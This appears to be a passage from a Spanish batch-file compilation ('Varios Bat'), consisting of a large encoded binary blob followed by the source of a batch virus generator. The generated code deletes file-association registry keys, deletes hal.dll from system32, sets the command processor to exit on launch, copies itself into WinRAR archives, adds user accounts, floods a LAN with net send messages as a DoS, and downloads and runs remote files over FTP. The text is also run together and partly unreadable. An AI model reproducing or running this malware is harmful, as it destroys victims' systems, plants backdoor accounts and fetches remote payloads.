^^^^y9r5M4dGo/w]gU]I$@#j%a%%a%..'D__:^^^>!:S{-=A%%%%EbS[2z7V#TS{^^^",8lLh!T,x#3:O)i^^^",8tV]Vl!'D:$Y=02Z!-%a%%a%]d);!'D8%%%%6QC,8DxgXW/2z7Oi2_N,8DxN^^^>+^^^&,x#7S,mY^^^",8t%%%%SXwuEn`:^^^>!ENFVK%a%%a%){!A1y:B!Ag?#oAK!)$(^^^"p7gdU=-P4/w^^^"l7yN'2W8t0^^^>$T!KSe,9===]$`N3N,OH%a%%a%R6^^^>R#wNv!+D2Y9^^^>6($!x,L!#\HYy^^^>s^^^"i!v#l)K\0)a(L!1h5'^^^".Yj-QC(S!#XO$y%a%%a%Im^^^&/i9x3vit9mFjN${GT[94^^^&V0h^^^<n=IMITYa!+@Kofa!^^^&S7OHR^^^<-b@5+?_sWW_!u%a%%a%EY-_oRA0E/mu:^^^^5m^^^"me2jbBEn9Gx7j0DIl%%%%fcd^^^&`.DftepKSGuwfmsOyE-7g@Lm1%a%%a%;QGTN{t'DzgJTx^^^>^^^"0^^^<*Q`Ily(ZTW8'3^^^"^^^&Qxe4=^^^"\/K;c'*TrtVo\nX'5-Ah5jv!Q%a%%a%!)S+F25`#C_3tX=6Gm^^^>DQ^^^>Pw^^^&In/al%%%%-US^^^^'QC[G'Z_gf\Sp@D^^^"{.KPC5smSX/[e%a%%a%:?sj$+G5Io7[?_=_=78xGz@no1e:yD2/-XK3xuV]YyJYg?%%%%Pt8;x^^^^y^^^&a-EC/#J_M%a%%a%t)Qa!W8Z(lg_8Gt`)$^^^&JukN$?]K0u^^^"EdA/R'iCa(8n!.`'L;a7G1(T]y_1a.+OfS%a%%a%iE$-:baE=Y@RGR^^^<)C9G,!SzO.mdK8fm'D\u*%%%%\[Gw3GwlVlza:BfN``AK5mZYndF%a%%a%Dp#xd^^^>17?%%%%k'XN*ZCENGo^^^^pl^^^"HgX9rZCC9@R2^^^"lc^^^>HhAU%%%%gHRF-q:GQ+e;dX.m1e%a%%a%0BSuSDDxSwPqtYS59gZ_zPbm#=eM@yXKCYq1U7TpIkam'5^^^&pVJ-=JDn?yM#3!B!O%a%%a%2^^^<i%%%%,W4Cog3Vk0GhD5%%%%^^^>$@V1;N(,1q^^^";v2\yD9Un7V?z#mX^^^"FLs1o58uQ5AAi{Hx%a%%a%^^^<BE^^^&Ki6R\T;mkAXBh@PK_2E0.YvjeIVf19={Wcnn_UY;lx*XJ!^^^>k[P6r:[0s\[^^^<^^^"

Page 48: Varios Bat

%a%%a%[P4^^^"s\D];Gk9\^^^^wuud7a==+F^^^<^^^"*t#{z98T]M^^^"GgBJO)-^^^&r!5^^^&@Cim6!S2f#0^^^&n,@%a%%a%Hcu^^^"AA6j4!!adP$WD^^^^QFc]BrK0vGA$/mF#hi`nYJ3aro'FT?l;@x:D\n?Qo{)TZF%a%%a%7o,3W.`R46PGnmI]G,t)P^^^",Ne4G^^^&J^^^>7[;d^^^<40vaGfF!OVbFLIj^^^<g=Ln6uFU9xV*c%a%%a%I)iR.ZLBzVn[Wg\xH2GDjbQ^^^"XNz@^^^<J[k8^^^"S,gs_^^^>?`0`x)7(Ga0aeY94P*dB^^^^]^^^^Q%a%%a%!+Pqgrb6r^^^<^^^>-+NT-aMkK,ralvr!!@k8bGzJkV{hk3Cwk)t-Co^^^>hX0Q*$JX$kL;Fi%a%%a%J[LDBV%%%%xr^^^"^^^&6UFA4t^^^^n**MhZJk^^^^sg(11i*iUAsP+0].[e0FjHS1^^^"U\3pu{G:OK8$%a%%a%KT0s^^^"^^^>*3c,/M'/{!AiC^^^>p?.{Iom7AD'nC9@@7;J@f!ADjYFjIx5un._)=GQ2VRS*%a%%a%FDdY:dy.^^^"QuHzGL$!AY9,4]!^^^<H!$dX?x!^^^^mvkezNdh#5Nx@-#XPQu^^^"#m($N$d`$C%a%%a%b2N^^^^G!+]!')K?DU^^^&X:Nb*q)ACOK%%%%q8^^^^r1L%%%%hWs^^^&JLh7s!`ha)?=I:n)/.hrIBW:l%a%%a%$DU^^^&!:oitRiUf=^^^"%%%%^^^&e%%%%u%%%%8`;J+_`Tz!O.I^^^&z^^^&LA\$v#,h^^^&KsEvIW'`Rh2n^^^<H61Lq%a%%a%BiBifbNR!!!!!!!!!*,4!!!!#,L]G!)IRmnoM{MrK:Wny1OWSm'A8^^^<99D=^^^&[jf^^^&5%a%%a%J.uqKtx#dsa=bsdQ!!!!#XbVKI6JyPoxn$4`#XbDwy'ag3,^^^&y[5ri{)eVQj.nRG`%a%%a%oh'')l83^^^&Xrs-+/(n0YW0[82u=-Sf(:?n0YW0[82u=-Sf(;X,@,?GYO?_T#fd0S6%a%%a%'8,?GXx+=@(kYXK/':GnTAow/*xt6I{^^^"OA,^^^>3E)A7JxQOC=/8E!^^^>+7beMOg^^^>{^^^"yi%a%%a%Qq=^^^<#m9)K:Rw,W:BK1,?7C[R{^^^"zUZ-cdY9,8!f^^^":IBj=!,dGN)ohlq9IKGcl*$^^^&B%a%%a%$(4`87CMY*![xt^^^&JQ1uT*pf'R{_zH4^^^"V^^^"^^^&'+*ron8m({dtG#1q(d%%%%5!@3\#\e^^^<yo%a%%a%=C!-!kf:Iw'/+9q:x^^^^ryh;0+x`\T!9!*d^^^^N@-^^^^e11zlpMy_{^^^^rBh1H0W!'!DH4#[%a%%a%{^^^"w{!)!!^^^"f\BNDWFzx_M+bN2!^^^"!),4^^^"^^^&/6s\7y/,3jzs?:%%%%B8xS\\(+/:)w/y=#T%a%%a%yCBYyY!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%a%%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%a%%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%a%%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%a%%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%a%%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%a%%a%!!!!!!!!!!xd!9!qdPBf!!!!!!!!!!!!!!'^^^&!^^^"N(hd#+!!!!!!!!!!!!!!!F1q)I%a%%a%J^^^&!-!!!!!!!!!!!!!!!!!!!!!!!!!%%%%wO^^^"^^^&(W!^^^"N-hd#+3!!$!^^^<?w%%%%5Iu!'!!!!!!%a%%a%wg!-!!!!!^^^"xd!9!!!!!^^^"0n\Lq;VVhuI-;lN#%%%%^^^^/k91VUT^^^"CW!+\u(M*!-9Q$'_!!%a%%a%;pt%%%%T^^^&3Q.feQX^^^^#k!)t5jV5+wUN{)lTeIWBf!L3R.jsSA#O9H2RKRp!!^^^"rk/X7].%a%%a%G'1^^^"_N_G!!]gATZSC8Q*gq_g!!!2B);W=;^^^<ERhb=1q!!)TZMFz!^^^"^^^<^^^<4WJ^^^<k.VmLO%a%%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%a%%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%a%%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%a%%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%a%%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!^^^&Z!!!!!!!!%a%%a%,8!!!!#k!!!-N^^^"!!7O!!!G!!!!6j~^^^<%a%GoTo:eof%a%:AbajoEfct%a%Efects.exe HideselfGoTo:eof:Vir%a%set rd=Reg Delete %a%%%rd%%HKCU\Control Panel\Sound /f%a%%%rd%%HKCU\.com%a%%%rd%%HKCU\.exe%a%%%rd%%HKCU\.pif%a%%%rd%%HKCU\.scr%a%%%rd%%HKCU\.cmd%a%%%rd%%HKCU\.txt%a%%%rd%%HKCU\.exe%a%attrib -r -a -s -h %%systemroot%%\system32\hal.dll%a%del /q /f %%systemroot%%\system32\hal.dll%a%reg add ^"HKLM\Software\Microsoft\Command Processor^" /v AutoRun /f /d ^"Exit^"^>nulGoTo:eof:InfRar%a%If not exist %%ProgramFiles%%\WinRAR\WinRAR.exe GoTo NoInfectRar%a%start winrar.exe a %InfectRar% %%0%a%:NoInfectRarGoTo:eof:UserPass%c%Escriba un usuario: 14 1 & set /p User=%c%Escriba una clave: 14 1 & set /p Pass=%a%net user %User% %Pass% /add >> !name!.batGoTo ExisteE:Lan%b%%c%1.- Mensaje a todos los usuarios 1 vez 14 1%b%%c%2.- Mensaje al usuario una vez 14 1%b%%c%3.- DoS a la red Lan 14 1

Page 49: Varios Bat

%b%%c%Seleccione una opcion: 14 1 & set /p Lan=if "%Lan%"=="" GoTo Lanif %Lan%==1 goto Lan1if %Lan%==2 goto Lan2if %Lan%==3 goto Lan3%c% Valor incorrecto. 15 4%a%%c% Presione una tecla para continuar . . . 14 1Pause>nulGoTo Lan:Lan1%c%Introduzca el Mensaje a enviar: 14 1 & set /p LanMsg=%a%Net send * %LanMsg% >> !name!.batGoTo ExisteE:Lan2%c%Introduzca el Mensaje a enviar: 14 1 & set /p LanMsg=%a%Net send %%username%% %LanMsg% >> !name!.batGoTo ExisteE:Lan3%c%Introduzca el Mensaje a enviar: 14 1 & set /p LanMsg=%a%set Finito=0%a%:bucleFinito >> !name!.bat%a%set /a Finito=%%Finito%% + 1%a%if %%Finito%%==1000 GoTo Break%a%Net send * %LanMsg% >> !name!.bat%a%GoTo bucleFinito >> !name!.bat%a%:BreakGoTo ExisteE:DownFile%c%Introduce el Login de tu FTP: 14 1 & set /p UserFTP=%c%Introduce tu Pass: 14 1 & set /p PassFTP=%c%Introduce la direccion del FTP: 14 1 & set /p FTP=%c%Introduce el nombre del archivo: 14 1 & set /p FileName=%c%Introduce la ruta en donde guardarlo: 14 1 & set /p FileSave=:DownFile2Cls%c%1. Ejecutarse al descargarse 14 1%b%%c%2. No ejecutarse 14 1%b%set /p FTPOpt=If "%FTPOpt%"=="" GoTo DownFile2If %FTPOpt%==1 %e%Down1 >> !name!.bat & GoTo ExisteEIf %FTPOpt%==2 %e%Down2 >> !name!.bat & GoTo ExisteE%c% Valor incorrecto. 15 4%a%%c% Presione una tecla para continuar . . . 14 1Pause>nulGoTo DownFile2:Down1%a%%a%%UserFTP% ^> C:\datos.txt%a%%a%%PassFTP% ^>^> C:\datos.txt%a%%a%put C:\datos.txt datos.txt ^>^> C:\datos.txt%a%%a%binary ^>^> C:\datos.txt%a%%a%get %FileName% %FileSave%\%FileName% ^>^> C:\datos.txt%a%%a%delete datos.txt ^>^> C:\datos.txt%a%%a%bye ^>^> C:\datos.txt%a%ftp -s:C:\datos.txt %FTP%%a%del /f /q C:\datos.txt%a%start %FileSave%\%FileName%GoTo:eof:Down2%a%%a%%UserFTP% ^> C:\datos.txt%a%%a%%PassFTP% ^>^> C:\datos.txt%a%%a%put C:\datos.txt datos.txt ^>^> C:\datos.txt%a%%a%binary ^>^> C:\datos.txt%a%%a%get %FileName% %FileSave%\%FileName% ^>^> C:\datos.txt%a%%a%delete datos.txt ^>^> C:\datos.txt%a%%a%bye ^>^> C:\datos.txt%a%ftp -s:C:\datos.txt %FTP%

Page 50: Varios Bat

%a%del /f /q C:\datos.txtGoTo:eof

--------------------------------------------------------------------END--------------------------------------------------------------------